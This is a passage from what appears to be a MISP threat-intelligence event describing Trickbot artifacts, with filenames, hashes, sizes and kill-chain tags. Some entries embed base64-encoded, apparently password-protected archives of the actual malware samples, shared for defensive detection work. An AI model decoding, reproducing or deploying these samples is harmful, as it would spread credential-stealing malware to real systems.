6dz51sojG54jGiB7qvGKFLMv9Yte1CvH6sE2ZmIBHHKxxtsUXKu8QQSJbvhC4r90XBkDCizeKH9bVWpZ4W1cbSReBhUipR5SAUlWOfHGTp8asVr7o3WMYKKrzFwhRQfeXd1gTF3r1z9xcyInY6NY8Fl5jlE2JZ+sGN9XM3/C7LF4b6WfWqQMoBSlFqZQ3GK4Ht3d+c07gqNIJLaegPhxfr7ZJ/e66ElYrKx5JIbZ/1Ba+e1EI+kgCJ1bKDui9mGq+hTz2Fk3tQCjgHLcZ4mC7yvjo7jx5VDOL55iwcsX+VOZCiRgz8kxlvFAS9uM0FgwhFSVAwA9AAg8CvxyQ/d83d4CyCZO3ZOl3ihISHje7JRbsZ+l8Obm/NBUvtPyg2uRk7nCfQZyTbTE2TAldx7qKj4F5ZzMU72Y1aIMZ9cyo4xY49QB3gEV4nxiamdZMtrBim9tJgGsQ7SuxeL6zwXmzRsmivcGg00UfJuQRLh2sFyPndD1VouyyxZvhifCcIChC5ZKhstV4fzSj/3qTAtlyO25uYJtc7dggx7BU2tcEb9a3SoUZJQ4aFbf4C2uI1GLpDBRngolo/k9noHHZ0U+ylheuKTaFpjawpJbBd6owSFBxSw2bMGtcJVN2Tkx0AtCSZleCf1Zp5YR8tvrcotkzS2YzJ8G2GSk3KN+RxzXyZ0Fz0hXt45/J9LHaN8yD6MpxLfsQio5Zvuu2wa/JNLvIOHiv81W8H6qB4ekxi+hQlWQK1xicjTRM2NuSpjFn/1Y7TQMXSm0FtL7ooKf4suevJP5ivWL6a26KHTfhq2ItKCXZRdPMwAzONPiwTYjPmDiTqQrhQ5cuDiDJICK8eJKwRRLPefsgSyHh8Q0YfKcOJd4Yim3PXpsvNebZe9cF
J/PFfZ+ousqvpmpSKD4v/q+qvetjht5BYQrTr7s7dHmoLhEIEpc2aIZSMUEkz4+DB72iyqnvn2E8uGq1vxq
"deleted": false,
"disable_correlation": false,
"object_relation": "malware-sample",
"timestamp": "1584440909",
"to_ids": true,
"type": "malware-sample",
"uuid": "5e70a31f-75a8-4738-b9c9-4c760a0a020f",
"value": "VMMM.exe|1853b48b655d5bd0a34791a93da8647c",
"Tag": [
{
"colour": "#c5008e",
"local": "0",
"name": "kill-chain:Installation",
"relationship_type": ""
},
{
"colour": "#991515",
"local": "0",
"name": "trickbot",
"relationship_type": ""
}
]
},
{
"category": "Artifacts dropped",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "filename",
"timestamp": "1584440095",
"to_ids": false,
"type": "filename",
"uuid": "5e70a31f-f590-4b24-8fea-4cff0a0a020f",
"value": "VMMM.exe"
},
{
"category": "Artifacts dropped",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "md5",
"timestamp": "1584440095",
"to_ids": true,
"type": "md5",
"uuid": "5e70a31f-708c-4060-a4eb-47480a0a020f",
"value": "1853b48b655d5bd0a34791a93da8647c"
},
{
"category": "Artifacts dropped",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "sha1",
"timestamp": "1584440095",
"to_ids": true,
"type": "sha1",
"uuid": "5e70a31f-0b48-4e8c-8c27-4d4b0a0a020f",
"value": "bfb30a9a08612be1a772fba531cf885bb8cf48aa"
},
{
"category": "Artifacts dropped",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "sha256",
"timestamp": "1584440095",
"to_ids": true,
"type": "sha256",
"uuid": "5e70a31f-2360-448b-8a84-41a10a0a020f",
"value": "281651b91568f18d3aca7c28d4f1b0f5220673736afb41a00c268cac2355bfc3"
},
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "size-in-bytes",
"timestamp": "1584440095",
"to_ids": false,
"type": "size-in-bytes",
"uuid": "5e70a31f-7f84-4937-b1e8-41e80a0a020f",
"value": "262144"
}
]
},
{
"comment": "",
"deleted": false,
"description": "File object describing a file with meta-information",
"meta-category": "file",
"name": "file",
"template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215",
"template_version": "17",
"timestamp": "1584440909",
"uuid": "5e70a382-87ec-4e10-a667-4bfa0a0a020f",
"Attribute": [
{
"category": "Artifacts dropped",
"comment": "",
"data": "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
"deleted": false,
"disable_correlation": false,
"object_relation": "malware-sample",
"timestamp": "1584440909",
"to_ids": true,
"type": "malware-sample",
"uuid": "5e70a382-e5f4-4617-8154-4d020a0a020f",
"value": "0gi7s88zgyl7qz9uwcwgcjigat_x2k3zrofs8xd_rfur2a61vxg28au9ha00n7pt.exe|05edcb0eb84c33833186465b81a7fe9c",
"Tag": [
{
"colour": "#c5008e",
"local": "0",
"name": "kill-chain:Installation",
"relationship_type": ""
},
{
"colour": "#991515",
"local": "0",
"name": "trickbot",
"relationship_type": ""
}
]
},
{
"category": "Artifacts dropped",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "filename",
"timestamp": "1584440194",
"to_ids": false,
"type": "filename",
"uuid": "5e70a382-7d2c-4394-ad78-4f950a0a020f",
"value": "0gi7s88zgyl7qz9uwcwgcjigat_x2k3zrofs8xd_rfur2a61vxg28au9ha00n7pt.exe"
},
{
"category": "Artifacts dropped",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "md5",
"timestamp": "1584440194",
"to_ids": true,
"type": "md5",
"uuid": "5e70a382-1e5c-4d1d-bc44-42f90a0a020f",
"value": "05edcb0eb84c33833186465b81a7fe9c"
},
{
"category": "Artifacts dropped",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "sha1",
"timestamp": "1584440194",
"to_ids": true,
"type": "sha1",
"uuid": "5e70a382-0974-441f-af47-41a30a0a020f",
"value": "8e8c984943d0bcde75c7306f0d7f80afaa65e18e"
},
{
"category": "Artifacts dropped",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "sha256",
"timestamp": "1584440194",
"to_ids": true,
"type": "sha256",
"uuid": "5e70a382-3ea4-4cd8-8aa1-40700a0a020f",
"value": "f3bc96c4ae65ade028cd97d9b7ae0d82251c4af20ec4cbc4cd1ffefa5ac90eb2"
},
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "size-in-bytes",
"timestamp": "1584440194",
"to_ids": false,
"type": "size-in-bytes",
"uuid": "5e70a382-9d58-4d89-8cee-43a30a0a020f",
"value": "397312"
}
]
},
{
"comment": "",
"deleted": false,
"description": "File object describing a file with meta-information",
"meta-category": "file",
"name": "file",
"template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215",
"template_version": "17",
"timestamp": "1584440909",
"uuid": "5e70a3c0-8c80-4209-9e58-4d240a0a020f",
"Attribute": [
{
"category": "Artifacts dropped",
"comment": "",
"data": "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
"deleted": false,
"disable_correlation": false,
"object_relation": "malware-sample",
"timestamp": "1584440909",
"to_ids": true,
"type": "malware-sample",
"uuid": "5e70a3c0-9a58-41ff-8ecb-44140a0a020f",
"value": "61y3xfon4je4qk9qm5zy6v3xhzlxf8ubmvbs567ig7snb8vqwb27xk7rb2vh2_yk.exe|2f1ac455d1c6e2a3f3e0d1137b047696",
"Tag": [
{
"colour": "#c5008e",
"local": "0",
"name": "kill-chain:Installation",
"relationship_type": ""
},
{
"colour": "#991515",
"local": "0",
"name": "trickbot",
"relationship_type": ""
}
]
},
{
"category": "Artifacts dropped",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "filename",
"timestamp": "1584440256",
"to_ids": false,
"type": "filename",
"uuid": "5e70a3c0-e594-45ad-937d-4c930a0a020f",
"value": "61y3xfon4je4qk9qm5zy6v3xhzlxf8ubmvbs567ig7snb8vqwb27xk7rb2vh2_yk.exe"
},
{
"category": "Artifacts dropped",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "md5",
"timestamp": "1584440256",
"to_ids": true,
"type": "md5",
"uuid": "5e70a3c0-0248-48a6-8a74-41190a0a020f",
"value": "2f1ac455d1c6e2a3f3e0d1137b047696"
},
{
"category": "Artifacts dropped",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "sha1",
"timestamp": "1584440256",
"to_ids": true,
"type": "sha1",
"uuid": "5e70a3c0-6124-4058-a54d-4f650a0a020f",
"value": "ba32c066d5927fa20b38d69357ce2ccee321b09a"
},
{
"category": "Artifacts dropped",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "sha256",
"timestamp": "1584440256",
"to_ids": true,
"type": "sha256",
"uuid": "5e70a3c0-bdec-45f6-af1a-430d0a0a020f",
"value": "cf99990bee6c378cbf56239b3cc88276eec348d82740f84e9d5c343751f82560"
},
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "size-in-bytes",
"timestamp": "1584440256",
"to_ids": false,
"type": "size-in-bytes",
"uuid": "5e70a3c0-03a4-4d2f-884b-459b0a0a020f",
"value": "115712"
}
]
}
]
}
}